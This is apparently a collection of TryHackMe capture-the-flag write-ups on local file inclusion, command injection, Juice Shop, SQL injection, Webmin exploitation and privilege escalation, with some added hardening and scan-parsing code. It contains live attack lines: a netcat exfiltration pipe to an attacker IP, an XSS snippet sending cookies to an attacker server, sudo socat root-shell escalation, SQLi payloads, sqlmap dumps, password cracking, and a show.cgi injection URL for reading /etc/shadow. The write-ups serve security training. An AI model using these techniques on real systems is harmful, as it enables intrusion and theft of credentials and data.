lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash
#falconfeast:rootpassword
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false
```
If you look carefully you will see a username + password. Now ssh to the machine:
```console
kali@kali:~$ ssh falconfeast@10.10.14.166
falconfeast@inclusion:~$ ls
articles  user.txt
falconfeast@inclusion:~$ cat user.txt
```

# root
Start by checking which sudo commands falconfeast is allowed to run as root:
```console
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat
```

## socat
- [socat](https://linux.die.net/man/1/socat)
- [more about socat](https://medium.com/@copyconstruct/socat-29453e9fc8a6)
- [GTFObin](https://gtfobins.github.io/gtfobins/socat/)
```console
falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh
whoami
root
cat /root/root.txt
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/Injection.md:
--------------------------------------------------------------------------------
Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers.

# NOTE
- don't forget ```;```

# Blind Command Injection
Blind command injection occurs when the system call that's being made does not return the response of the call to the Document Object Model (or DOM).
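The "does this user exist?" check behind the blind injection, written out in Python as an added example (not the room's PHP): the vulnerable version interpolates the username into a shell command line and reports only found / not found, so a command appended after `;` runs although nothing of it reaches the page; the hardened versions pass an argv list without a shell and allow-list the input. Function names, the regex and the marker-file demo are assumptions for illustration.

```python
"""Blind command injection in a user-lookup, vulnerable and hardened (added example).
Only an exit status is reported, which is exactly the blind case from the room."""
import os
import pwd
import re
import subprocess
import tempfile

SHELL_META = re.compile(r"[;&|`$\n<>]")               # what an injected string needs
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")  # POSIX-style allow-list


def user_exists_vulnerable(username):
    """BAD: the username becomes part of a /bin/sh command line, so
    'root; <anything>' executes <anything> with the web server's rights."""
    cmd = f"id {username} > /dev/null 2>&1"
    return subprocess.run(cmd, shell=True).returncode == 0


def user_exists_no_shell(username):
    """Better: argv list, no shell, so metacharacters stay inside one argument
    and 'root; touch x' is simply an unknown user."""
    return subprocess.run(["id", username], capture_output=True).returncode == 0


def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None


def user_exists_hardened(username):
    """Best: allow-list the input and do not spawn a process at all."""
    if not is_valid_username(username):
        raise ValueError("invalid username")
    try:
        pwd.getpwnam(username)
        return True
    except KeyError:
        return False


def looks_injected(value):
    """Cheap detector for request logs or WAF rules: a field that should only
    ever hold a username has no business containing shell metacharacters."""
    return SHELL_META.search(value) is not None


def demo_blind_injection():
    """Runs a harmless payload ('touch' on a file in a fresh temp dir) through
    both lookups and reports whether each one actually executed it. Note the
    vulnerable call still answers True: the caller never sees the difference."""
    marker = os.path.join(tempfile.mkdtemp(), "injected")
    vulnerable = user_exists_vulnerable(f"root; touch {marker}")
    marker2 = os.path.join(tempfile.mkdtemp(), "blocked")
    no_shell = user_exists_no_shell(f"root; touch {marker2}")
    return {
        "vulnerable_result": vulnerable,
        "vulnerable_ran_payload": os.path.exists(marker),
        "no_shell_result": no_shell,
        "no_shell_ran_payload": os.path.exists(marker2),
    }


if __name__ == "__main__":
    print(demo_blind_injection())
    print("hardened root:", user_exists_hardened("root"))
```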

![php](https://i.imgur.com/lB8diiC.png)

Blind command injection occurs when the response of the HTTP request is not returned to the DOM. You can see in the above code that the response is never returned anywhere on the page. The only thing that gets returned is an alert that says whether a user was found on the system or not. For the purposes of this room, I made the alert tell you what was going on, but sometimes it won't be that easy. So here are a few ways to tell whether you have blind command injection or not.

## Ping!
Since the code is making a system call in some way, a ping will cause the page to continue loading until the command has completed. So if you send a ping with 10 ICMP packets, the page should be loading for about 10 seconds.

## Redirection of Output

Ping is usually enough to tell you whether you have blind command injection, but if you want to test further, you can attempt to redirect the output of a command to a file, then, using the browser, navigate to the page where the file is stored. We all know the `>` Bash operator redirects output to a file or process, so you could try redirecting the output of `id`, `whoami`, `netstat`, `ip addr` or another useful command to see if you can see the results.

## Bypassing the Blind Injection with Netcat

In the spirit of full disclosure, there is a way to bypass the blind injection with netcat. You are able to pipe the output of a command to a nc listener. You could do something like ```root; ls -la | nc {YOUR_IP} {PORT}```. This will send the output of ls -la to your netcat listener.

## Action
1. Ping the box with 10 packets. What is this command (without IP address)?
```; ping -c ```
2. Redirect the box's Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?
```; uname -r > linux.txt```. Now http:///linux.txt

More commands to get the kernel version?
```console
$ uname -a
$ cat /proc/version
$ dmesg | grep Linux
```
Just for fun I did ```; cat /etc/passwd > pass.txt```. This is what I found. lol, first time doing OS injection, super cool!!
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
```

# Active Command Injection
Active command injection will return the response to the user.
It can be made visible through several HTML elements.


`passthru()` on [PHP's website](https://www.php.net/manual/en/function.passthru.php),

## Commands to try

**Linux**
- whoami
- id
- ifconfig/ip addr
- uname -a
- ps -ef

**Windows**
- whoami
- ver
- ipconfig
- tasklist
- netstat -an

4. What is the user's shell set as?
```cat /etc/passwd | grep www-data```

5. What version of Ubuntu is running?
```lsb_release -a```
6. Print out the MOTD. What favorite beverage is shown?
Read more about the MOTD: [MOTD](https://serverfault.com/questions/481146/there-are-two-motds-shown-when-i-login-to-my-server-using-ssh)
```console
$ find / -name 00-header; 2> /dev/null
/snap/core/8268/etc/update-motd.d/00-header
/snap/core/9066/etc/update-motd.d/00-header
/etc/update-motd.d/00-header
```
# flag
```console
$ find / -name flag.txt; 2> /dev/null
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/JuiceShop.md:
--------------------------------------------------------------------------------
# Broken authen
## Jim reset password
- jim@juice-sh.op
- check all the reviews in the shop and google more about him
- https://en.wikipedia.org/wiki/James_T._Kirk
- James Kirk's brother, George Samuel Kirk, is first mentioned in
## admin password...
just try easy, well-known passwords
# Sensitive Data Exposure
- /#/about
- something interesting in the `legel.md` download link
# Broken Access Control
1. Access the administration section of the store - What is the name of the page?
  - open devtool and check main.js
  - search for `admin`
2. devtool -> Storage -> user session storage
3. go to the administration section and remove it
# XSS
- find iframe tag payload


# bonus track
Just me trying to learn how to craft XSS for sending a cookie to my server (nc):
```js
'http://:/?cookie=' + encodeURI(document.cookie);

// works
```
--------------------------------------------------------------------------------
/TryHackMe/Easy/Pokemon.md:
--------------------------------------------------------------------------------
# recon
Like always, start with nmap. I use my own tool to automate nmap scans; check it out: [pymap](https://github.com/gu2rks/pymap)
```console
$ python3 pymap.py -t $IP
```
There are 2 open ports:
- 22/tcp open ssh
- 80/tcp open http

If a web server is up, I always start by running `gobuster` to brute-force web directories. While `gobuster` is running, I explore the web app, "walking the happy path" by using the site the way a normal user would.

## rabbit hole + user credential
I started by checking the source code and I found this:
``. Of course I opened the dev tools and checked what is in the console. I found an array with pokemon names...
```js
[
  "Bulbasaur",
  "Charmander",
  "Squirtle",
  "Snorlax",
  "Zapdos",
  "Mew",
  "Charizard",
  "Grimer",
  "Metapod",
  "Magikarp"
]
```
Moreover, I found this js script.
```js
```
I tried to understand it but it seemed to lead me nowhere... So I went back to the source and checked it again in case I missed something.


Yep, I missed not just something. There is a username:password hidden somewhere close to ``. But I was so focused on checking the console log messages.......

# foot hold
Now that we have user credentials, let's ssh to the victim server and enumerate the server a bit.

```console
pokemon@root:~$ sudo -l
[sudo] password for pokemon:
Sorry, user pokemon may not run sudo on root.
pokemon@root:~$ id
uid=1000(pokemon) gid=1000(pokemon) groups=1000(pokemon),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare)
4096 Jun 24 13:48 ..
drwx------ 6 root root 4096 Jun 24 14:14 ash
drwxr-xr-x 18 pokemon pokemon 4096 Aug 10 09:53 pokemon
-rwx------ 1 ash root 8 Jun 22 23:21 roots-pokemon.txt
```
So as you can see, the current user is not allowed to run sudo. Moreover, there are 2 users on this server: the current user and `ash`. I assume that `ash` is a root user since he is the main guy in pokemon :P.

Now let's enumerate more. I end up finding a `.zip` file in `Desktop`. Unzip it and you will find our first flag!!
```console
pokemon@root:~$ cd Desktop/
pokemon@root:~/Desktop$ ls
P0kEmOn.zip
pokemon@root:~/Desktop$ unzip P0kEmOn.zip
Archive: P0kEmOn.zip
creating: P0kEmOn/
inflating: P0kEmOn/grass-type.txt
pokemon@root:~/Desktop$ ls
P0kEmOn P0kEmOn.zip
pokemon@root:~/Desktop$ cd P0kEmOn/
pokemon@root:~/Desktop/P0kEmOn$ ls
grass-type.txt
pokemon@root:~/Desktop/P0kEmOn$ cat grass-type.txt
50 __ __ __ __ __ __
```
The flag is encoded; decode it and submit the flag!


At this point we know the format of the flag. We can craft a simple name pattern and use `find` to look for more flags. The 1st flag is called `grass-type.txt`, so I assume the other flags look something like `pokemontype-type.txt`, where *pokemontype* can be grass, fire, water, electric, etc. The `-name` pattern will be `*-type.txt`.


Now let's run the find command (the pattern is quoted so the shell does not expand it before `find` sees it):
```console
pokemon@root:~$ find / -user pokemon -name '*type.txt' 2> /dev/null
/var/www/html/water-type.txt
/home/pokemon/Desktop/P0kEmOn/grass-type.txt
```
Bingo! Grab the flag! Note that the flag is encoded (again). Decode it and submit the flag.
**hint**: ROT


The current user's home directory is huge. There are many subdirectories and such. Let's enumerate all of them at once with `pokemon@root:~$ ls -la *`. You will find a really interesting directory. Dig deeper and you will find a file called `Could__________for?.cplusplus`

```console
pokemon@root:~/__________$ cat Could__________for?.cplusplus
# include

int main() {
    std::cout << "ash : "
    return 0;
}
```

We found `ash`'s credential, and I guessed that he is a root user. Now let's log in as `ash`.

# root
There are many ways to log in as `ash`. You can `ssh` as `ash` or use `su`. In this case, I will use `su`:
```console
pokemon@root:~$ su ash
Password:
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

bash: /home/ash/.bashrc: Permission denied
ash@root:/home/pokemon$
```
Yeah, let's grab `roots-pokemon.txt`.
```console
ash@root: cat /home/roots-pokemon.txt
```
We still need to find the 3rd flag. Since we already have the pattern for finding flags, let's reuse it!!
```console
ash@root:/$ find / -user ash -name '*type.txt' 2> /dev/null
ash@root:/$ find / -user root -name '*type.txt' 2> /dev/null
/____/________/fire-type.txt
```
Grab the flag and decode it
**hint**: BASE__, GL and happy hacking
-------------------------------------------------------------------------------- /TryHackMe/Easy/PostExploitationBasics.md: --------------------------------------------------------------------------------
# Post-Exploitation Basics
Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. https://tryhackme.com/room/postexploit

## [Task 2] Enumeration w/ Powerview
ssh to the target and run `powershell -ep bypass`. `-ep bypass` lets you bypass the PowerShell execution policy. The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it. For more info read [this](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)


Since we included `-ep bypass`, we will be able to execute `PowerView`:
```ps
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
```
Now let's enumerate the domain using `Get-NetUser`:
```ps
PS C:\Users\Administrator> Get-NetUser | select cn # getting all users

cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{P0W3RV13W_FTW}
sshd
PS C:\Users\Administrator> Get-NetGroup -GroupName *admin* # Enumerate the domain groups whose name matches *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins
```
-------------------------------------------------------------------------------- /TryHackMe/Easy/RP: Metasploit.md: --------------------------------------------------------------------------------
# Task 5: Move the shell
```
Remember that database we set up? In this step, we're going to take a look at what we can use it for and exploit our victim while we're at it!

As you might have noticed, up until this point we haven't touched nmap in this room, let alone perform much recon on our victim box. That'll all change now as we'll take a swing at using nmap within Metasploit. Go ahead and deploy the box now, it may have up to a three-minute delay for starting up our target vulnerable service.

*Note, Metasploit does support different types of port scans from within the auxiliary modules. Metasploit can also import other scans from nmap and Nessus just to name a few.
```

2. What service does nmap identify running on port 135?
`db_nmap -sV 10.10.127.144 -p 135`
3. Let's go ahead and see what information we have collected in the database. Try typing the command '`hosts`' into the msfconsole now.
4. How about something else from the database, try the command '`services`' now.
5. One last thing, try the command '`vulns`' now. This won't show much at the current moment, however, it's worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.
6. Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type 'use' followed by a unique string found within only the target exploit. For example, try this out now with the following command 'use icecast'. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start

Don't have the energy to copy stuff, so here is my note:
```console
$ msfconsole
$ set PAYLOAD windows/meterpreter/reverse_tcp # set payload
$ set LHOST #
$ search # search for exploit
$ use # select the exploit
$ set RHOST
$ set RPORT
$ run -j # run the exploit as a background job
$ exploit # run the exploit
$ jobs # check all jobs running on the system
$ sessions # list all sessions
```
-------------------------------------------------------------------------------- /TryHackMe/Easy/RP:Nmap.md: --------------------------------------------------------------------------------
to read: [link](https://docs.google.com/document/d/1q0FziVZM3zCWhcgtPpljVPzkBX0fMAh6ebrXVM5rg08/edit)

# Nmap Quiz
1. help = -h
2. Syn Scan = -sS
3. UDP Scan = -sU
4. OS detection = -O
5. service version detection = -sV
6. verbosity flag = -v
7. very verbose = -vv
8. output in xml format = -oX
9. Aggressive scan = -A
10. set timing to max = -T5 (1-5)
11. specific port = -p
12. every port = -p-
13. use a script = --script
14. use script in vulnerability category = --script vuln
15. skip ping = -Pn

# Nmap Scanning
1. syn scan = `nmap -sS`
2. scanning first 10000 ports = `2`
```console
nmap -sS 10.10.121.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:48 EDT
Nmap scan report for 10.10.121.13
Host is up (0.047s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```
3. communication protocol of the open ports = `tcp`
4. service version on SSH = `6.6.1p1`
```console
root@kali:~# nmap -sV -p 22 10.10.121.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:50 EDT
Nmap scan report for 10.10.121.13
Host is up (0.046s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
```
5. find out what flag on port 80 is not set by performing an aggressive scan = `httponly`
```console
root@kali:~# nmap -A -p 80 10.10.121.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:51 EDT
Nmap scan report for 10.10.121.13
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop...
|_Requested resource was login.php
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%), Android 7.1.1 - 7.1.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   45.09 ms 10.9.0.1
2   43.99 ms 10.10.121.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```
6. Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. = `http-slowloris-check`
```console
root@kali:~# nmap --script vuln -p 80 10.10.121.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:56 EDT
Nmap scan report for 10.10.121.13
Host is up (0.045s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /login.php: Possible admin folder
|   /robots.txt: Robots file
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 321.99 seconds
```
-------------------------------------------------------------------------------- /TryHackMe/Easy/Smag-Grotto.md: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/Smag-Grotto.md
-------------------------------------------------------------------------------- /TryHackMe/Easy/bolt.md: --------------------------------------------------------------------------------
# recon
3 open ports:
- 22/tcp open ssh
- 80/tcp open http, *Apache "It works" page*
- 8000/tcp open http-alt


## port 8000
- admin = Jake
```console
$ gobuster dir -u http://$IP:8000/ -w /usr/share/SecLists/Discovery/Web-Content/big.txt -t 54
.
/.htaccess (Status: 200)
/async (Status: 401)
/entries (Status: 200)
/pages (Status: 200)
/search (Status: 200)
.
```
Nothing interesting from gobuster.

Let's walk the *happy path*; there are two posts:
- `entry/message-for-it-department` -> "...t! my password is `boltadmin123` just in case you need it!"
- `/entry/message-from-admin`: "myself Jake and my username is bolt"

Then I found a link to this site: https://bolt.cm/. The link can be found in the `navbar` (The Bolt Site) and in the site footer (© 2020 • This website is Built with Bolt.). After some digging I found the CMS login page: `/bolt`

Now log into the CMS using the credentials we found. Note that the website uses **Bolt Version: 3.7.1**. If you google for a bolt exploit you will easily find an RCE exploit module in Metasploit (check [here](https://www.rapid7.com/db/modules/exploit/unix/webapp/bolt_authenticated_rce)).

So, no more talk, let's run Metasploit and get a foothold.

# foot hold/root
Follow the steps on the rapid7 link above: you need to `set` username, password, rhost and lhost, then `run`.

Boom! You should get a foothold on the victim's server. Run `which python/python3` to check whether `python2.7` or `python3` is installed; we will use it to spawn a *tty shell*.

```console
which python3
/usr/bin/python3
python3 -c 'import pty; pty.spawn("/bin/sh")'
# whoami
whoami
root
# pwd
pwd
/home
# ls
ls
bolt composer-setup.php flag.txt
```
Luckily we gained root just by getting a foothold. You see why you should not run any service on your server as root: if someone hacks you, they gain root access to your server at once.
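The NSE output in the RP:Nmap notes above (`http-cookie-flags`, `http-slowloris-check`) is easier to act on once it is parsed into findings. The script below is an added example, not code from these write-ups or from nmap: it reads nmap's normal text output, groups the NSE script blocks under their port, and reports cookies served without a flag plus vuln scripts whose State came back VULNERABLE, with their CVE IDs. The scan text it runs on is constructed for the demo, modelled on the output above.

```python
"""Triage nmap normal (text) output into actionable findings.

Added example (not code from these write-ups or from nmap). SAMPLE_SCAN is
constructed for the demo, modelled on the RP:Nmap output above.
"""
import re
from dataclasses import dataclass, field

SAMPLE_SCAN = """\
PORT    STATE SERVICE
80/tcp  open  http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open.
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
443/tcp open  https
| http-cookie-flags:
|   /:
|     session:
|_      secure flag not set
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class PortReport:
    port: int
    proto: str
    state: str
    service: str
    scripts: dict = field(default_factory=dict)   # script name -> body lines


def parse_scan(text):
    """Group the NSE script output under the port line it follows."""
    reports, current, script = [], None, None
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = PortReport(int(m[1]), m[2], m[3], m[4])
            reports.append(current)
            script = None
            continue
        if current is None or not raw.startswith("|"):
            continue
        body = raw[1:]
        if body.startswith("_"):              # "|_" marks the last line of a script block
            body = body[1:]
        indent = len(body) - len(body.lstrip(" "))
        if indent <= 1:                       # header line: "<script>: <optional summary>"
            name, _, summary = body.strip().partition(":")
            script = name
            current.scripts[script] = [summary.strip()] if summary.strip() else []
        elif script is not None:
            current.scripts[script].append(body.strip())
    return reports


def cookie_findings(report):
    """(path, cookie, missing flag) triples from the http-cookie-flags block."""
    out, path, cookie = [], None, None
    for line in report.scripts.get("http-cookie-flags", []):
        if line.startswith("/") and line.endswith(":"):
            path = line[:-1]
        elif line.endswith(":"):
            cookie = line[:-1]
        elif "flag not set" in line and path and cookie:
            out.append((path, cookie, line.split()[0]))
    return out


def vuln_findings(report):
    """(script, state, [cves]) for vuln scripts whose State contains VULNERABLE."""
    out = []
    for name, lines in report.scripts.items():
        state = next((ln.split(":", 1)[1].strip() for ln in lines
                      if ln.startswith("State:")), None)
        # "NOT VULNERABLE" also contains the word, so exclude it explicitly.
        if state and "VULNERABLE" in state and "NOT" not in state:
            cves = sorted({c for ln in lines for c in CVE_RE.findall(ln)})
            out.append((name, state, cves))
    return out


def triage(text):
    """Flatten everything into (port, category, detail) rows."""
    rows = []
    for r in parse_scan(text):
        for path, cookie, flag in cookie_findings(r):
            rows.append((r.port, "cookie-flag", f"{cookie} at {path} lacks {flag}"))
        for name, state, cves in vuln_findings(r):
            rows.append((r.port, "vuln", f"{name}: {state} {','.join(cves)}"))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_SCAN):
        print(*row, sep="\t")
```

Feed it a saved `nmap -oN` file instead of `SAMPLE_SCAN` to triage a real scan; the header/body split relies on nmap's `|`/`|_` prefixes and two-space indentation, so it will not work on output whose whitespace has been collapsed.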

-------------------------------------------------------------------------------- /TryHackMe/Easy/gamezone.md: --------------------------------------------------------------------------------
# what I learned
- sqlmap
- checking open socket connections: `ss -tulpn`
- Reverse SSH port forwarding
- read more about the exploit; msfconsole is not the only solution, you can try something else too.


# enumerate
- 22/tcp open ssh
- 80/tcp open http
  - Apache/2.4.18 (Ubuntu)
  - **gobuster**
    - /images (Status: 301)
    - /index.php (Status: 200)
    - /portal.php (Status: 302)

# foothold
The login form is vulnerable to SQLi. I tried username `admin`, password `' or 1=1 -- -` but it didn't work. I then tried inserting `' or 1=1 -- -` as the username instead.

Voilà, it redirected me to */portal.php*. There is a search form that can be used to search for a game review. Is it also vulnerable to SQLi? Let's insert `' or 1=1 -- -` in the search form.

![sqli](pic/Screenshot%202020-07-27%20at%2012.32.50.png)

Yep, we got all the reviewed games, which means it is vulnerable to SQLi.

Now we are going to use sqlmap, which is an automatic SQL injection and database takeover tool. The plan is to use it to dump the whole database. Let's start by opening *Burp Suite* and intercepting the request sent when we use the search bar.

Copy the whole request (headers and body) and save it in a .txt file; we will use it with sqlmap.

```console
kali@kali:~/THM/game$ ls
req.txt
kali@kali:~/THM/game$ head req.txt
POST /portal.php HTTP/1.1
Host: 10.10.102.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.102.254/portal.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Connection: close
kali@kali:~/THM/game$ sqlmap -r req.txt --dbms=mysql --dump
```
You will get 2 tables:
1. post: contains all game reviews
2. user: user:password

Now let's crack the password using *hashcat*:
```console
$ hashcat -m 1400 -a 0 -o crack.txt 'hash' /usr/share/wordlists/rockyou.txt --force
```
Now ssh to the server and get the user flag:
```console
agent47@gamezone:~$ sudo -l
[sudo] password for agent47:
Sorry, user agent47 may not run sudo on gamezone.
```
# root
Check socket connections:
```console
agent47@gamezone:~$ ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port
udp   UNCONN 0      0      *:10000           *:*
udp   UNCONN 0      0      *:68              *:*
tcp   LISTEN 0      80     127.0.0.1:3306    *:*
tcp   LISTEN 0      128    *:10000           *:*
tcp   LISTEN 0      128    *:22              *:*
tcp   LISTEN 0      128    :::80             :::*
tcp   LISTEN 0      128    :::22             :::*
```
Use `curl` to find out more about the service on port 10000. It seems to run `Webmin`. Now let's check `ps aux` and find out whether webmin is run by root. If so, we might be able to use it to escalate and gain root privileges.

```console
agent47@gamezone:~$ ps aux | grep webmin
root 1235 0.0 1.2 75020 25928 ? Ss 05:11 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
```
Bingo! webmin is running as root.


We can see that the service running on port 10000 is blocked from the outside via a firewall rule (we can see this from the `iptables` list). However, using an SSH tunnel we can expose the port to ourselves (locally)!


If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do `ssh -L 9000:imgur.com:80 user@example.com`. Going to `localhost:9000` on your machine will load imgur traffic using your other server.

On kali:
```console
kali@kali:~/THM/game$ ssh -L 9999:localhost:10000 agent47@$IP
```
Now visit localhost:9999. I tried to log in with default credentials but it didn't work. I then tried agent47's credentials. Bingo!

After I got the webmin version and researched exploits for it, I found [this](https://www.rapid7.com/db/modules/exploit/unix/webapp/webmin_show_cgi_exec), so let's use `msfconsole` then.


Damn it! It didn't work for me. Then I found [this](https://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf) in the References of the msf module (previous link).


Read page 2 under *3 Technical Explanation* and you will find some juicy information:
`"https://webminserver.dom.com/file/show.cgi/bin/echo|ls%20–la|"`
You can manipulate the last part of the URL (after `/file/show.cgi/bin/`) and make it return the file you want.



**hint**: `/file/show.cgi/bin/echo|cat%20 something`
You want to get root access? Use the same method but cat /etc/shadow instead, then crack root's password.
